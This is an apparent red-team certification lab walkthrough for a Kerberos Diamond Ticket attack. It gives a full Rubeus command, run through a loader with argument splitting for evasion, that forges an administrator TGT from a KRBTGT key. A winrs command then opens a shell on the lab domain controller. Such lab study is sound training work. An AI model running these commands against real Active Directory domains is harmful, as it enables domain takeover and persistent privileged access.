CRTP Lab 10

Task

Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

We can use Rubeus for Diamond Ticket attack. We are modifying the TGT here.

Open a DA shell and use the KRBTGT key to modify and sign the TGT.

# ArgSplit for "diamond"
# Use Rubeus with Loader
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Access the DC using winrs from the spawned process

winrs -r:dcorp-dc cmd

PreviousDiamond Ticket NextSkeleton Key

Last updated 1 year ago